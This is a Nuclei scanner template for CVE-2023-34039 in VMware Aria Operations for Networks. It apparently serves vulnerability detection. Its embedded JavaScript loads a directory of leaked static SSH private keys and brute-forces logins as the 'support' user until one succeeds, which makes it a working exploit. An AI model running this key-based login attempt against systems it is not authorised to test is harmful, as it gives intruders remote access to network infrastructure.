nuclei-templates/javascript/cves/2023/CVE-2023-34039.yaml


id: CVE-2023-34039

info:
  name: VMWare Aria Operations - Remote Code Execution
  author: tarunKoyalwar
  severity: critical
  description: |
    VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
    Version: All versions from 6.0 to 6.10
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution or a complete system crash.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix this vulnerability.
  reference:
    - https://github.com/sinsinology/CVE-2023-34039.git
    - https://nvd.nist.gov/vuln/detail/CVE-2023-34039
    - http://packetstormsecurity.com/files/174452/VMWare-Aria-Operations-For-Networks-Remote-Code-Execution.html
    - http://packetstormsecurity.com/files/175320/VMWare-Aria-Operations-For-Networks-SSH-Private-Key-Exposure.html
    - https://www.vmware.com/security/advisories/VMSA-2023-0018.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-34039
    cwe-id: CWE-327
    epss-score: 0.21241
    epss-percentile: 0.95916
    cpe: cpe:2.3:a:vmware:aria_operations_for_networks:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: vmware
    product: aria_operations_for_networks
  tags: cve,cve2023,vmware,aria,rce

variables:
  keysDir: "helpers/payloads/cve-2023-34039-keys" # load all private keys from this directory

javascript:
  # the init field can be used to make any preparations before the actual exploit
  # here we read all private keys from the helpers folder and store them in a list
  - init: |
      let m = require('nuclei/fs');
      let privatekeys = m.ReadFilesFromDir(keysDir)
      updatePayload('keys',privatekeys)
    # check if port is open before bruteforcing
    pre-condition: |
      isPortOpen(Host,Port)
    # actual exploit
    code: |
      let m = require('nuclei/ssh')
      let c = m.SSHClient()
      c.ConnectWithKey(Host,Port,'support@'+Host,key) // returns true if connection is successful
    args:
      Host: "{{Host}}"
      Port: "22"
      key: "{{keys}}"
      keysDir: "{{keysDir}}"
    payloads:
      # 'keys' will be replaced by the actual private keys after init is executed
      keys:
        - dummy1
        - dummy2
    threads: 10
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - success && response
# digest: 490a004630440220682dc6d4303a779d6391e3d9135dd5025226c2c1bfefb0f27f43fd60cc43df71022033c9c9bcf644b9cef0d133fb6fd9dd7a398bfdb8a425d3f813c98fa467b248d3:922c64590222798bb761d5b6d8e72950